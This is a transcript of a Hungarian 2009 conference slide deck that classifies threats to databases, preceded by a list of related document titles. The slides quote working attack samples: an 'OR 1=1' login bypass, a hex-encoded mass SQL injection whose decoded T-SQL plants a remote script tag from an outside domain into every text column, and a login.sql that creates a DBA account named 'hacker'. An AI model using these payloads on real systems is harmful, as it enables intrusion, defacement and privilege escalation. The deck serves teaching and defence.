Adatbázisok elleni fenyegetések rendszerezése. Fleiner Rita BMF/NIK Robothadviselés 2009



Hasonló dokumentumok
ADATBÁZISOK ELLENI FENYEGETÉSEK RENDSZEREZÉSE

Webes alkalmazások fejlesztése 1. előadás. Webes alkalmazások és biztonságuk

Webapp (in)security. Gyakori hibákról és azok kivédéséről fejlesztőknek és üzemeltetőknek egyaránt. Veres-Szentkirályi András

OO PDO. Tehát PDO használatával, könnyen átállhatunk egy másik adatbáziskezelőre, anélkül hogy a kódot teljes egészében újraírnánk.

Ez a szuri fájni fog!

Webes alkalmazások fejlesztése 1. előadás. Webes alkalmazások és biztonságuk. Cserép Máté

(appended picture) hát azért, mert a rendszerek sosem

Weboldalak biztonsága

ROBOTHADVISELÉS S 2010

Silent Signal Kft. Webáruházak informatikai biztonsága Veres-Szentkirályi András Marketingtorta - 4 1

Az adatbázis-biztonság szerepe és megvalósításának feladatai a kritikus információs infrastruktúrák védelmében

Csomag. Adatbázis-objektum Programozási eszközök gyűjteménye Két részből áll. specifikáció törzs (opcionális)

Gyimesi István fejlesztési vezető Cardinal Számítástechnikai Kft.

Csatlakozás a BME eduroam hálózatához Setting up the BUTE eduroam network

ADATBÁZIS-KEZELÉS - BEVEZETŐ - Tarcsi Ádám, ade@inf.elte.hu

Az SQL*Plus használata

Elektronikus levelek. Az informatikai biztonság alapjai II.

LBRA6i integrált rendszer

Földmérési és Távérzékelési Intézet

Web service fenyegetések e- közigazgatási. IT biztonsági tanácsadó

KRITIKUS ADATBÁZISOKRA ÉPÜLŐ INFORMATIKAI RENDSZEREK ARCHITEKTÚRÁI ÉS BIZTONSÁGI SZEMPONTJAI

Adatbázis Rendszerek II. 5. PLSQL Csomagok 16/1B IT MAN

Webtárhely létrehozása a helyen. Lépések Teendő 1. Böngészőbe beírni: 2. Jobb oldalon regisztrálni (tárhelyigénylés).

Adatbázis Rendszerek II. 8. Gyakorló környezet

Debreceni Egyetem Informatikai Kar TANULÓI NYILVÁNTARTÓ SZOFTVER FIREBIRD ADATBÁZIS ALKALMAZÁSÁVAL

A JGrid rendszer biztonsági architektúrája. Magyaródi Márk Juhász Zoltán Veszprémi Egyetem

Adatbázis Rendszerek II. 2. Gyakorló környezet

Kilencedik témakör: Lazarus-Firebird. Készítette: Dr. Kotsis Domokos

Fogalomtár Etikus hackelés tárgyban Azonosító: S2_Fogalomtar_v1 Silent Signal Kft. Web:

Oracle E-Business Suite üzemeltetés a Rába Járműipari Holding Nyrt.-nél

Oracle Audit Vault and Database Firewall. Gecseg Gyula Oracle DBA

Intelligens biztonsági megoldások. Távfelügyelet

Tranzakciókezelés PL/SQL-ben

Biztonság. Információ. Adat. Információelmélet. Információbiztonság az alkalmazásfejlesztésben ADAT INFORMÁCIÓ

Vizuális programozás gyakorlat

JavaScript bűvésztrükkök, avagy PDF olvasó és böngésző hackelés

Adatbáziskezelés php-ben MySQL adatbáziskezelı rendszert használva

Táblakezelés: Open SQL Internal table. Tarcsi Ádám: Az SAP programozása 1.

SQLServer. Védelmi struktúra

1. Bevezető. 2. Sérülékenységek

B I T M A N B I v: T M A N

Sérülékenység kezelés. Komli József project manager PTA CERT-Hungary Központ

Weboldalak Biztonsági Kérdései

SQL jogosultság-kezelés. Privilégiumok Grant és Revoke Grant Diagrammok

Adatbázisok I. Definíció: DDL: - objektum létrehozás CREATE - objektum megszüntetés DROP - objektum módosítás ALTER

Információbiztonsági kihívások. Horváth Tamás & Dellei László

Symfony kurzus 2014/2015 I. félév. Security: authentication, authorization, user provider, role-ok, access control, FOS user bundle

Google Cloud Print útmutató

Elosztott rendszer architektúrák

INFORMATIKA EGYRE NAGYOBB SZEREPE A KÖNYVELÉSBEN

5.1 Környezet Hálózati topológia

Számítógépes munkakörnyezet II. Szoftver

Adatbázis kezelés Delphiben. SQL lekérdezések

Debreceni Egyetem Matematikai és Informatikai Intézet. 13. Védelem

Database Systems II. ZH összefoglaló

Mobil Telefonon Keresztüli Felügyelet Felhasználói Kézikönyv

A gyakorlat során MySQL adatbázis szerver és a böngészőben futó phpmyadmin használata javasolt. A gyakorlat során a következőket fogjuk gyakorolni:

LINUX LDAP címtár. Mi a címtár?

NGFW + IPS + anti-apt + BYOD = Sophos UTM 9.2

Adatbiztonság PPZH május 20.

SQLi és XSS sérülékenységek

XSS férgek és vírusok

Adatbázis másolás Slony-I segítségével

Megtanuljuk, hogyan lehet egy web-alkalmazással adatbázishoz csatlakozni Pontosan megnézzük a PHP lehetőségeit o MySQL-hez o Oracle-höz

Adatbázis rendszerek 7. előadás State of the art

Adatbázis használata PHP-ből

Együttes hozzárendelés

Adatbázis-kezelés. Harmadik előadás

LOGalyze Telepítési és Frissítési Dokumentáció Verzió 3.0

IV.4. FELHŐ ALAPÚ BIZTONSÁGOS ADATTÁROLÁSI MÓDSZER ÉS TESZTKÖRNYEZET KIDOLGOZÁSA

IV.4. FELHŐ ALAPÚ BIZTONSÁGOS ADATTÁROLÁSI MÓDSZER ÉS TESZTKÖRNYEZET KIDOLGOZÁSA

8. Gyakorlat SQL. DDL (Data Definition Language) adatdefiníciós nyelv utasításai:

Írásjogtól Rootig AIX-on

Számítógépes hálózatok

Alkalmazások biztonsága

Hozzunk ki többet abból amink van. Fehér Lajos

Kezdő lépések Microsoft Outlook

Az internet az egész világot behálózó számítógép-hálózat.

KnowledgeTree dokumentumkezelő rendszer

Adatbázis-kezelő rendszerek. dr. Siki Zoltán

Windows hálózati adminisztráció segédlet a gyakorlati órákhoz

Adatbázis Rendszerek II. 1. SQL programozási felületek 39/1B IT MAN

ELEKTRONIKUS MUNKABÉRJEGYZÉK MODUL

SQL*Plus. Felhasználók: SYS: rendszergazda SCOTT: demonstrációs adatbázis, táblái: EMP (dolgozó), DEPT (osztály) "közönséges" felhasználók

Egészítsük ki a Drupal-t. Drupal modul fejlesztés

Alkalmazások architektúrája

Adatbázis Rendszerek II. 2. Ea: Gyakorló környezet

API tervezése mobil környezetbe. gyakorlat

Hálózati architektúrák és Protokollok GI 8. Kocsis Gergely

Kétcsatornás autentikáció

B IT MAN 65/1. Adatbázis Rendszerek II. Ellenőrző kérdések APLSQL B IT MAN. v:

Hálózati operációs rendszerek II.

Adatbázis rendszerek. dr. Siki Zoltán

Titkok. Oracle adatbázisok proaktív es reaktív védelmi eszközei. Mosolygó Ferenc, vezetı technológiai tanácsadó. <Insert Picture Here>

TSIMMIS egy lekérdezés centrikus megközelítés. TSIMMIS célok, technikák, megoldások TSIMMIS korlátai További lehetségek

BGF. 4. Mi tartozik az adatmodellek szerkezeti elemei

GDPR az EU Általános Adatvédelmi Rendelete - minden vállalkozás életét érintő jogszabály -

Az elektronikus másolatkészítés rendszerének műszaki dokumentációja 1. BEVEZETŐ

Gyakorlati vizsgatevékenység B

Izsó Krisztián Péti Zoltán. Cisco Identity Services Engine

Átírás:

Adatbázisok elleni fenyegetések rendszerezése Fleiner Rita BMF/NIK Robothadviselés 2009

Előadás tartalma Adatbázis biztonsággal kapcsolatos fogalmak értelmezése Rendszertani alapok Rendszerezési kategóriák az adatbázis fenyegetések esetében Jellegzetes adatbázis fenyegetések összegyűjtése a támadás pontja szerint

Bevezető fogalmak Adatbázisok fenyegetettségei Adatbázisok sebezhetőségei: a biztonság alanyának tulajdonsága, hiányossága Adatbázis-biztonság fogalma Biztonság: állapot, a lehetséges fenyegető hatások elleni, megkívánt mértékű védettség Biztonság alanya Védendő tulajdonságai

Bevezető fogalmak Adatbázis-biztonság alanya (a fenyegetések által veszélyeztetett objektum) Adatbázisokban tárolt adatok (szűk értelmezés) + ABKR (tág értelmezés) Adatbázis-biztonság alanyának védendő tulajdonságai Adatok: sértetlenség, rendelkezésre állás, bizalmasság, (letagadhatatlanság, hitelesség) ABKR: sértetlenség, rendelkezésre állás

Rendszertanok alapjai Cél: egy adott szakterület (tudományterület) objektumainak számbavétele és besorolása valamely kategóriába Rendszertan követelményei Rendszerezendő objektumok meghatározása Besorolási szempontok Egyértelmű besorolhatóság

Egy lehetséges architektúra

Kategorizálási szempontrendszerek I. A támadó adatbázishoz való viszonya szerint 1. Külső támadás 2. Belső támadás A támadó indíttatása szerint 1. Szándékos 2. Véletlen

Kategorizálási szempontrendszerek II. A támadás által sérült biztonsági tulajdonságok szerint 1. Adat sértetlensége 2. Adat rendelkezésre állása 3. Adat bizalmassága 4. ABKR sértetlensége 5. ABKR rendelkezésre állása

Kategorizálási szempontrendszerek III. A támadás helye szerint 1. Hálózat 2. Alkalmazás 3. Platform (hardver, szoftver) 4. Adatbázis

A támadás helye az architektúrában 1. Hálózat 2. Alkalmazás 3. Platform (hardver, szoftver) 4. Adatbázis

Jellegzetes hálózati fenyegetések Technikák: Hálózati adatforgalom lehallgatása Forráscím meghamisításával beékelődéses támadás Szolgáltatás megtagadása (DoS) típusú támadás (ABKR ellen, pl. SYN csomagok elárasztásával) Puffer túlcsordulás Hálózati-szállítási réteg fenyegetései Adatbázis hálózati (kommunikációs) protokollok fenyegetései

Adatbázis kommunikációs protokolljának támadása Adatbázis kliens Kliens program Adatbázis kommunikációs protokoll Szállítási réteg (pl. TCP) Hálózati réteg (pl. IP) Fizikai réteg Adatbázis szerver Adatbázis szerver program Adatbázis kommunikációs protokoll Szállítási réteg (pl. TCP) Hálózati réteg (pl. IP) Fizikai réteg Üzenetek lehallgatása Üzenet struktúrájának, mező méretének, tartalmának megváltoztatása

Jellegzetes alkalmazás fenyegetések Puffer túlcsordulás SQL injekció XSS

SQL injekció példa: Hitelesítés kijátszása Bejelentkezés az alkalmazásba Sérülékeny kódrészlet: SqlQry = "SELECT * FROM Users WHERE Username = " & Request.QueryString("User") & " ' AND Password = " & Request.QueryString("Pass") & " "; LoginRS.Open SqlQry, MyConn; If LoginRS.EOF Then Response.Write("Invalid Login");

SQL injekció Jóhiszemű felhasználó: John felhasználó név + Smith jelszó SELECT * FROM Users WHERE Username = John AND Password = Smith Rosszhiszemű felhasználó: John felhasználó név + X OR 1 = 1 jelszó SELECT * FROM Users WHERE Username = John AND Password = X OR 1 = 1

XSS támadás Tipikusan web alkalmazások sérülékenységét használja Rosszindulatú web-felhasználó kártékony kódot illeszt weblapra, amit más felhasználó is lát Például: HTML kód vagy kliens oldali script

XSS és SQL injekció kombinálása Legitim link helyett http://www.domain.com/filename.cfm?variable1=0&variable2=4241 Hacked link használata http://www.domain.com/foldername/filename.cfm? variable1=0&variable2=4241;declare%20@s%20char(4000);set%20@s =CAST(0x4445434C41524520405420766172636861722 8323535292C404 32076617263686172283430303029204445434C415245205461626C655F437 572736F7220435552534F522 0464F522073656C65637420612E6E 616D652C622E6E616D652066726F6D207379736F626A65637473206 A hozzáfűzött rész hexadecimális, az SQL szerver értelmezni tudja, a generált kód a következő:

DECLARE @T VARCHAR(255),@C VARCHAR(4000) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title> <script src="http://1.verynx.cn/w.js"></script><!--'' where '+@C+' not like ''%"></title> <script src="http://1.verynx.cn/w.js"></script><!--''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

XSS és SQL injection kombinálása Ha az AB felhasználó eléri a rendszer táblákat, akkor abból kigyűjti az adatbázis tábláit, majd a következő kódot szúrja be az összes tábla sztring alapú oszlopába: </title><script src="http://1.verynx.cn/w.js"></script><! Az áldozatok böngészőjében pedig lefut a megadott javascript.

Jellegzetes platformot érintő fenyegetések Operációs rendszer puffer túlcsorduláson keresztüli fenyegetése Operációs rendszer állományainak nem megfelelő védelme (jogosultságok hibás beállítása) ABKR login szkriptje AB mentéseket tartalmazó fájlok

Login szkript támadása -------------------login.sql----------------------------- set term off create user hacker identified by hacker; grant dba to hacker; set term on -------------------login.sql-----------------------------

Jellegzetes adatbázis fenyegetések ABKR rossz konfigurációjára építő fenyegetés ABKR rossz üzemeltetésére építő fenyegetés ABKR hitelesítési mechanizmusának fenyegetése Adatbázisok tárolt eljárásainak sérülékenységét kihasználó fenyegetés Puffer túlcsordulás SQL injekció Adatbázis jogosultságok rossz beállítása

Összefoglalás Támadási pont helye szerinti rendszerezés a védelem megtervezését is segíti Adatbázis-biztonság megvalósítását hatékonyan szolgálja, ha tudjuk, hol kell potenciális veszélyre számítani

Köszönöm a figyelmet!